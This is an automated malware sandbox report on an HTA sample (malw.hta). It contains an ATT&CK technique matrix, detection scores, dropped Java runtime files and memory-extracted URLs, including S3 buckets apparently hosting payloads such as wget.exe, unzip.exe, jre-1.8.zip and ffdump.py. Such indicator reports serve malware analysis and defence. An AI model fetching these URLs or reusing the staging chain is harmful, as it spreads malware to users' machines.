Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	11 Process Injection	2 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Proxy	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Services File Permissions Weakness	2 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	148 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Services File Permissions Weakness	1 DLL Side-Loading	LSA Secrets	51 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Services File Permissions Weakness	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Rundll32	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
malw.hta	7%	Virustotal		Browse
malw.hta	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\jna-1820491375\jna549618974871912275.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\sqlite-3.41.2.1-8817147a-097f-4350-b036-bfca281522c2-sqlitejdbc.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\sqlite-3.47.1.0-ccc74718-bc89-47f4-b3d2-0b12eb48d763-sqlitejdbc.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\API-MS-Win-core-xstate-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\JAWTAccessBridge-32.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\JavaAccessBridge-32.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\WindowsAccessBridge-32.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-console-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-fibers-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-multibyte-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\awt.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\bci.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\client\jvm.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dcpr.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\decora_sse.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\deploy.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dt_shmem.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dt_socket.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\dtplugin\deployJava1.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://repository.swisssign.com/SL	0%	Avira URL Cloud	safe
http://netpreserve.org/warc/1.0/revisit/identical-payload-digestWARC-Truncatedlengthapplication/http	0%	Avira URL Cloud	safe
http://repository.swisssign.com/kh	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exe	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exeDt	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exe&v	0%	Avira URL Cloud	safe
HTTP://WWW.CHAMBERSIGN.ORG	0%	Avira URL Cloud	safe
http://www.info-zip.org/zip-bug.html;	0%	Avira URL Cloud	safe
http://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenames	0%	Avira URL Cloud	safe
https://buskwet.s3.eu-west-1.amazonaws.com/py3.12.zip	0%	Avira URL Cloud	safe
http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf	0%	Avira URL Cloud	safe
http://openjdk.java.net/jeps/220).	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exe6v	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com:443/unzip.exe	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/(	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdf	0%	Avira URL Cloud	safe
https://octupusgreat.s3.us-east-1.amazonaws.com/ffdump.py	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com:443/wget.exe	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exe	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdfGI	0%	Avira URL Cloud	safe
https://buskwet.s3.eu-west-1.amazonaws.com	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exeft	0%	Avira URL Cloud	safe
http://java.oracle.com/java.vendor.url.bughttp://bugreport.sun.com/bugreport/%d.%djava.class.version	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipORSC)	0%	Avira URL Cloud	safe
https://branchlock.net/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y	0%	Avira URL Cloud	safe
https://branchlock.net	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipFilesC)	0%	Avira URL Cloud	safe
http://repository.swisssign.com/s	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exeItM	0%	Avira URL Cloud	safe
https://wwww.certigna.fr/autorites/k	0%	Avira URL Cloud	safe
http://www.quovadis.bm#	0%	Avira URL Cloud	safe
http://repository.swisssign.com/3x	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip.s3	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdf$Z	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipN)	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip	0%	Avira URL Cloud	safe
http://netpreserve.org/warc/1.0/revisit/identical-payload-digest	0%	Avira URL Cloud	safe
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.	0%	Avira URL Cloud	safe
http://www.info-zip.org/UnZip.htmlDVarFileInfo$	0%	Avira URL Cloud	safe
https://branchlock.netb	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://repository.swisssign.com/kh	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/	mshta.exe, 00000000.00000003.2202144379.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217427897.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246291371.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247223645.0000000007812000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201999349.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.000000000780E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217602385.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2244452730.0000000007810000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216468413.00000000078AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false		high
https://repository.luxtrust.lu0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exe&v	mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.chambersign.org/cps/chambersroot.html0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://netpreserve.org/warc/1.0/revisit/identical-payload-digestWARC-Truncatedlengthapplication/http	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false		high
http://repository.swisssign.com/SL	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://savannah.gnu.org/bugs/?func=additem&group=wget.	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://www.chambersign.org1	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exe	mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.swisssign.com/0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exeDt	mshta.exe, 00000000.00000003.2244452730.0000000007837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217602385.0000000007837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216712851.0000000007837000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
HTTP://WWW.CHAMBERSIGN.ORG	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://policy.camerfirma.com	javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.info-zip.org/zip-bug.html;	mshta.exe, 00000000.00000002.2247961132.000000000DB27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217308169.000000000C92C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216211143.000000000DA21000.00000004.00000020.00020000.00000000.sdmp, unzip.exe, 0000000F.00000000.3048871065.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenames	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	true	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/STCA.crl0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://openjdk.java.net/jeps/220).	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://octupusgreat.s3.us-east-1.amazonaws.com/ffdump.py	javaw.exe, 00000010.00000002.3202598403.000000000A5F7000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://buskwet.s3.eu-west-1.amazonaws.com/py3.12.zip	javaw.exe, 00000010.00000002.3197189783.000000000514F000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exe6v	mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com:443/unzip.exe	mshta.exe, 00000000.00000003.2216712851.0000000007837000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://repository.luxtrust.lu	javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.oracle.com/hotspot/jvm/vm/compiler/id	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.quovadisglobal.com/cps0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/(	mshta.exe, 00000000.00000003.2217427897.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246291371.00000000029C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdf	mshta.exe, 00000000.00000003.2218374707.0000000002921000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201999349.000000000780F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2226635939.0000000002924000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246043177.0000000002925000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2226365916.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2218125921.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2222533499.0000000002923000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2246265636.00000000029B6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATime	mshta.exe, 00000000.00000003.2244222939.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217974859.00000000078AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com:443/wget.exe	mshta.exe, 00000000.00000003.2202201319.0000000007853000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/unzip.exe	mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.oracle.com/hotspot/jvm/java/monitor/address	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high
